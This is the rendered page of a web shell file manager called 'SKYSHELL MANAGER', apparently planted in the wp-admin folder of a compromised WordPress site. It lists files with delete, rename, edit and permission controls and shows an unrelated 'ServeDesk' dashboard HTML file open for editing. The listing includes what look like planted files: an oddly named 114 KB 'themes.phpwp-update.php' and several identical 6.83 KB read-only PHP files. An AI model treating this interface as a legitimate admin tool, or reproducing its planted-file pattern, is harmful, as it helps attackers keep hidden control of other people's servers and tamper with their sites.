📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: dashboard.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Dashboard — ServeDesk</title> <link rel="icon" type="image/svg+xml" href="images/favicon.svg"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/5.3.3/css/bootstrap.min.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-icons/1.11.3/font/bootstrap-icons.min.css"> <link rel="preconnect" href="https://fonts.googleapis.com"> <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&display=swap" rel="stylesheet"> <link rel="stylesheet" href="css/style.css"> </head> <body class="dash-body"> <div class="sidebar-backdrop"></div> <!-- ===================== SIDEBAR ===================== --> <aside class="sidebar"> <a href="dashboard.html" class="sidebar-brand text-decoration-none"> <img src="images/logo-mark.svg" width="30" height="30" alt="ServeDesk"> ServeDesk </a> <nav class="sidebar-nav"> <div class="sidebar-section-label">Main</div> <a href="dashboard.html" class="nav-link active"><i class="bi bi-grid-1x2"></i> Dashboard</a> <a href="server-requirement.html" class="nav-link"><i class="bi bi-file-earmark-plus"></i> Server Requirement</a> <a href="server-request.html" class="nav-link"><i class="bi bi-list-check"></i> Server Request</a> <div class="sidebar-section-label">Account</div> <a href="#" class="nav-link"><i class="bi bi-person"></i> Profile</a> <a href="#" class="nav-link"><i class="bi bi-gear"></i> Settings</a> <a href="logout.php" class="nav-link"><i class="bi bi-box-arrow-right"></i> Logout</a> </nav> <div class="sidebar-footer"> <!-- PHP: replace with session user data --> <div class="sidebar-user"> <div class="avatar">D</div> <div> <div class="fw-semibold small">Demo User</div> <small>demo@servedesk.com</small> </div> </div> </div> </aside> <!-- ===================== MAIN ===================== --> <div class="main-wrap"> <div class="topbar"> <div class="d-flex align-items-center gap-3"> <button class="btn btn-menu btn-outline-secondary"><i class="bi bi-list"></i></button> <div> <div class="fw-bold">Dashboard</div> <div class="breadcrumb-mini">Overview</div> </div> </div> <div class="d-flex align-items-center gap-2"> <button class="topbar-icon-btn"><i class="bi bi-bell"></i><span class="badge-dot">2</span></button> <div class="avatar d-none d-sm-flex" style="width:40px;height:40px;">D</div> </div> </div> <div class="page-content"> <div class="d-flex align-items-center justify-content-between flex-wrap gap-2 mb-4"> <div> <h4 class="page-title mb-1">Welcome back, Demo User</h4> <p class="text-muted mb-0">Here's what's happening with your server requests.</p> </div> <a href="server-requirement.html" class="btn btn-brand"><i class="bi bi-plus-circle"></i> New Server Requirement</a> </div> <!-- PHP: replace hardcoded numbers with COUNT() queries filtered by current user (or all, for admins) --> <div class="row g-3 mb-4"> <div class="col-6 col-lg-3"> <div class="stat-card d-flex align-items-center gap-3"> <div class="stat-icon" style="background:#eef2ff;color:#4f46e5;"><i class="bi bi-file-earmark-text"></i></div> <div><div class="stat-num">24</div><div class="stat-label">Total Requests</div></div> </div> </div> <div class="col-6 col-lg-3"> <div class="stat-card d-flex align-items-center gap-3"> <div class="stat-icon" style="background:#fef3c7;color:#92400e;"><i class="bi bi-hourglass-split"></i></div> <div><div class="stat-num">6</div><div class="stat-label">Pending</div></div> </div> </div> <div class="col-6 col-lg-3"> <div class="stat-card d-flex align-items-center gap-3"> <div class="stat-icon" style="background:#ede9fe;color:#5b21b6;"><i class="bi bi-tools"></i></div> <div><div class="stat-num">5</div><div class="stat-label">In Configuration</div></div> </div> </div> <div class="col-6 col-lg-3"> <div class="stat-card d-flex align-items-center gap-3"> <div class="stat-icon" style="background:#dcfce7;color:#166534;"><i class="bi bi-check-circle"></i></div> <div><div class="stat-num">11</div><div class="stat-label">Success</div></div> </div> </div> </div> <div class="row g-4"> <div class="col-lg-8"> <div class="card-panel"> <div class="card-panel-head"> <h6 class="fw-bold mb-0">Recent Server Requests</h6> <a href="server-request.html" class="small fw-semibold">View all <i class="bi bi-arrow-right"></i></a> </div> <div class="card-panel-body"> <div class="table-responsive"> <table class="table table-requests align-middle mb-0"> <thead> <tr> <th>Request ID</th> <th>Server / Project</th> <th>Requested By</th> <th>Date</th> <th>Status</th> </tr> </thead> <tbody> <!-- PHP: loop over the latest 5 rows from $requests --> <tr> <td class="fw-semibold">SRV-1042</td> <td>Payment Gateway API</td> <td>Arjun Nair</td> <td>2026-07-28</td> <td><span class="badge-status pending">Pending</span></td> </tr> <tr> <td class="fw-semibold">SRV-1041</td> <td>Internal HR Portal</td> <td>Meera Pillai</td> <td>2026-07-27</td> <td><span class="badge-status approved">Approved</span></td> </tr> <tr> <td class="fw-semibold">SRV-1040</td> <td>Analytics Data Warehouse</td> <td>Rahul Verma</td> <td>2026-07-25</td> <td><span class="badge-status processing">Process</span></td> </tr> <tr> <td class="fw-semibold">SRV-1039</td> <td>Staging Environment</td> <td>Divya Krishnan</td> <td>2026-07-22</td> <td><span class="badge-status configuration">Configuration</span></td> </tr> <tr> <td class="fw-semibold">SRV-1038</td> <td>Customer Support CRM</td> <td>Karthik Iyer</td> <td>2026-07-18</td> <td><span class="badge-status success">Success</span></td> </tr> </tbody> </table> </div> </div> </div> </div> <div class="col-lg-4"> <div class="card-panel"> <div class="card-panel-head"><h6 class="fw-bold mb-0">Requests by Status</h6></div> <div class="card-panel-body"> <!-- PHP: replace widths/counts with real percentages from your data --> <div class="mb-3"> <div class="d-flex justify-content-between small mb-1"><span>Pending</span><span class="text-muted">6</span></div> <div class="progress" style="height:6px;"><div class="progress-bar" style="width:25%;background:#f59e0b;"></div></div> </div> <div class="mb-3"> <div class="d-flex justify-content-between small mb-1"><span>Approved</span><span class="text-muted">4</span></div> <div class="progress" style="height:6px;"><div class="progress-bar" style="width:17%;background:#3b82f6;"></div></div> </div> <div class="mb-3"> <div class="d-flex justify-content-between small mb-1"><span>Process</span><span class="text-muted">3</span></div> <div class="progress" style="height:6px;"><div class="progress-bar" style="width:12%;background:#f97316;"></div></div> </div> <div class="mb-3"> <div class="d-flex justify-content-between small mb-1"><span>Configuration</span><span class="text-muted">5</span></div> <div class="progress" style="height:6px;"><div class="progress-bar" style="width:21%;background:#8b5cf6;"></div></div> </div> <div> <div class="d-flex justify-content-between small mb-1"><span>Success</span><span class="text-muted">11</span></div> <div class="progress" style="height:6px;"><div class="progress-bar" style="width:46%;background:#22c55e;"></div></div> </div> </div> </div> </div> </div> </div> </div> <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/5.3.3/js/bootstrap.bundle.min.js"></script> <script src="js/app.js"></script> </body> </html>
Save